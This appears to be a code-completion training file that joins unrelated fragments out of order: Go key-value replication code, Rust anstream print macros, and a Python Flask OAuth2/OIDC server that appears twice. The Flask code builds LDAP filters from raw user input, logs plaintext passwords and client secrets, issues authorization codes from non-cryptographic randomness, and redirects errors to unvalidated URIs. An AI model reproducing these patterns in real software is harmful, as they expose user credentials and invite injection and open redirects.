body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
}
| {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
} else if i != senderID && senderVC[i] > replicaVC[i] { //if something else than the sender incremented clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
//Otherwise, our clock is only a difference of 1 in senderID slot between the currentVC and the senderVC
return true
} | identifier_body |
macros.rs | /// Prints to [`stdout`][crate::stdout].
///
/// Equivalent to the [`println!`] macro except that a newline is not printed at
/// the end of the message.
///
/// Note that stdout is frequently line-buffered by default so it may be
/// necessary to use [`std::io::Write::flush()`] to ensure the output is emitted
/// immediately.
///
/// **NOTE:** The `print!` macro will lock the standard output on each call. If you call
/// `print!` within a hot loop, this behavior may be the bottleneck of the loop.
/// To avoid this, lock stdout with [`AutoStream::lock`][crate::AutoStream::lock]:
/// ```
/// # #[cfg(feature = "auto")] {
/// use std::io::Write as _;
///
/// let mut lock = anstream::stdout().lock();
/// write!(lock, "hello world").unwrap();
/// # }
/// ```
///
/// Use `print!` only for the primary output of your program. Use
/// [`eprint!`] instead to print error and progress messages.
///
/// # Panics
///
/// Panics if writing to `stdout` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stdout can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use std::io::Write as _;
/// use anstream::print;
/// use anstream::stdout; | /// print!("on ");
/// print!("the ");
/// print!("same ");
/// print!("line ");
///
/// stdout().flush().unwrap();
///
/// print!("this string has a newline, why not choose println! instead?\n");
///
/// stdout().flush().unwrap();
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! print {
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stdout();
match ::std::write!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Prints to [`stdout`][crate::stdout], with a newline.
///
/// On all platforms, the newline is the LINE FEED character (`\n`/`U+000A`) alone
/// (no additional CARRIAGE RETURN (`\r`/`U+000D`)).
///
/// This macro uses the same syntax as [`format!`], but writes to the standard output instead.
/// See [`std::fmt`] for more information.
///
/// **NOTE:** The `println!` macro will lock the standard output on each call. If you call
/// `println!` within a hot loop, this behavior may be the bottleneck of the loop.
/// To avoid this, lock stdout with [`AutoStream::lock`][crate::AutoStream::lock]:
/// ```
/// # #[cfg(feature = "auto")] {
/// use std::io::Write as _;
///
/// let mut lock = anstream::stdout().lock();
/// writeln!(lock, "hello world").unwrap();
/// # }
/// ```
///
/// Use `println!` only for the primary output of your program. Use
/// [`eprintln!`] instead to print error and progress messages.
///
/// # Panics
///
/// Panics if writing to `stdout` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stdout can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use anstream::println;
///
/// println!(); // prints just a newline
/// println!("hello there!");
/// println!("format {} arguments", "some");
/// let local_variable = "some";
/// println!("format {local_variable} arguments");
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! println {
() => {
$crate::print!("\n")
};
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stdout();
match ::std::writeln!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Prints to [`stderr`][crate::stderr].
///
/// Equivalent to the [`print!`] macro, except that output goes to
/// `stderr` instead of `stdout`. See [`print!`] for
/// example usage.
///
/// Use `eprint!` only for error and progress messages. Use `print!`
/// instead for the primary output of your program.
///
/// # Panics
///
/// Panics if writing to `stderr` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stdout can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use anstream::eprint;
///
/// eprint!("Error: Could not complete task");
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! eprint {
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stderr();
match ::std::write!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Prints to [`stderr`][crate::stderr], with a newline.
///
/// Equivalent to the [`println!`] macro, except that output goes to
/// `stderr` instead of `stdout`. See [`println!`] for
/// example usage.
///
/// Use `eprintln!` only for error and progress messages. Use `println!`
/// instead for the primary output of your program.
///
/// # Panics
///
/// Panics if writing to `stderr` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stdout can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use anstream::eprintln;
///
/// eprintln!("Error: Could not complete task");
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! eprintln {
() => {
$crate::eprint!("\n")
};
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stderr();
match ::std::writeln!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Panics the current thread.
///
/// This allows a program to terminate immediately and provide feedback
/// to the caller of the program.
///
/// This macro is the perfect way to assert conditions in example code and in
/// tests. `panic!` is closely tied with the `unwrap` method of both
/// [`Option`][ounwrap] and [`Result`][runwrap] enums. Both implementations call
/// `panic!` when they are set to [`None`] or [`Err`] variants.
///
/// When using `panic!()` you can specify a string payload, that is built using
/// the [`format!`] syntax. That payload is used when injecting the panic into
/// the calling Rust thread, causing the thread to panic entirely.
///
/// The behavior of the default `std` hook, i.e. the code that runs directly
/// after the panic is invoked, is to print the message payload to
/// `stderr` along with the file/line/column information of the `panic!()`
/// call. You can override the panic hook using [`std::panic::set_hook()`].
/// Inside the hook a panic can be accessed as a `&dyn Any + Send`,
/// which contains either a `&str` or `String` for regular `panic!()` invocations.
/// To panic with a value of another other type, [`panic_any`] can be used.
///
/// See also the macro [`compile_error!`], for raising errors during compilation.
///
/// # When to use `panic!` vs `Result`
///
/// The Rust language provides two complementary systems for constructing /
/// representing, reporting, propagating, reacting to, and discarding errors. These
/// responsibilities are collectively known as "error handling." `panic!` and
/// `Result` are similar in that they are each the primary interface of their
/// respective error handling systems; however, the meaning these interfaces attach
/// to their errors and the responsibilities they fulfill within their respective
/// error handling systems differ.
///
/// The `panic!` macro is used to construct errors that represent a bug that has
/// been detected in your program. With `panic!` you provide a message that
/// describes the bug and the language then constructs an error with that message,
/// reports it, and propagates it for you.
///
/// `Result` on the other hand is used to wrap other types that represent either
/// the successful result of some computation, `Ok(T)`, or error types that
/// represent an anticipated runtime failure mode of that computation, `Err(E)`.
/// `Result` is used alongside user defined types which represent the various
/// anticipated runtime failure modes that the associated computation could
/// encounter. `Result` must be propagated manually, often with the the help of the
/// `?` operator and `Try` trait, and they must be reported manually, often with
/// the help of the `Error` trait.
///
/// For more detailed information about error handling check out the [book] or the
/// [`std::result`] module docs.
///
/// [ounwrap]: Option::unwrap
/// [runwrap]: Result::unwrap
/// [`std::panic::set_hook()`]: ../std/panic/fn.set_hook.html
/// [`panic_any`]: ../std/panic/fn.panic_any.html
/// [`Box`]: ../std/boxed/struct.Box.html
/// [`Any`]: crate::any::Any
/// [`format!`]: ../std/macro.format.html
/// [book]: ../book/ch09-00-error-handling.html
/// [`std::result`]: ../std/result/index.html
///
/// # Current implementation
///
/// If the main thread panics it will terminate all your threads and end your
/// program with code `101`.
///
/// # Examples
///
/// ```should_panic
/// # #![allow(unreachable_code)]
/// use anstream::panic;
/// panic!();
/// panic!("this is a terrible mistake!");
/// panic!("this is a {} {message}", "fancy", message = "message");
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! panic {
() => {
::std::panic!()
};
($($arg:tt)*) => {{
use std::io::Write as _;
let panic_stream = std::io::stderr();
let choice = $crate::AutoStream::choice(&panic_stream);
let buffer = $crate::Buffer::new();
let mut stream = $crate::AutoStream::new(buffer, choice);
// Ignore errors rather than panic
let _ = ::std::write!(&mut stream, $($arg)*);
let buffer = stream.into_inner();
// Should be UTF-8 but not wanting to panic
let buffer = String::from_utf8_lossy(buffer.as_bytes()).into_owned();
::std::panic!("{}", buffer)
}};
} | ///
/// print!("this ");
/// print!("will ");
/// print!("be "); | random_line_split |
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 client_id のチェック
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
# クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization request' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401 | app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# grant_type のチェック
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# リクエストのコードがDBに存在していなければエラー応答
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# 自己のDBからcodeを削除して再利用を防止する
code = codes.pop(code)
###
### アクセストークン作成
###
# アクセストークンは 2つの方法がある
# 1 乱数文字を生成、対応する情報をKVSでアプリと共有する
# 2 JWTを作成 アプリでJWTをバリデーションすることで情報をエル
# 以下は
# ランダムな文字列でアクセストークンを生成
# アプリサーバーが、リソースサーバーへアクセスする際に
# HTTPヘッダのAuthorization にaccess_token をセットする。
# つまり、JWTをセットすることも可能であり、ISTIOにも適用できるだろう
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# NoSQLに保存
# access_token はNoSQLに登録しておき、リソースサーバーでNoSQLをアクセスして
# access_token を照合して、不一致であればアクセスを拒否する
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### IDトークンを作成
###
# スコープをセット
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# スコープにopenid が存在、ユーザーがセットされていたら
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# LDAPからユーザーの属性をセットする
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDCのペイロード
# 参考 https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # 認証サーバーのURLアドレス
'sub': code['user'], # 一意のユーザーUID
'aud': code['client_id'], # 認可を受けたアプリID
'name': user_info['cn'][0], # ユーザー名
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 300 # 有効期限時刻 5分
}
# リクエストのnonceが入っていれば nonceを追加する
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# JWTの生成
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('id_tokenはバイナリからストリング化する')
token_response['id_token'] = id_token.decode()
app.logger.debug('id_tokenはバイナリからストリング化した')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True) | clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False: | random_line_split |
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 client_id のチェック
#
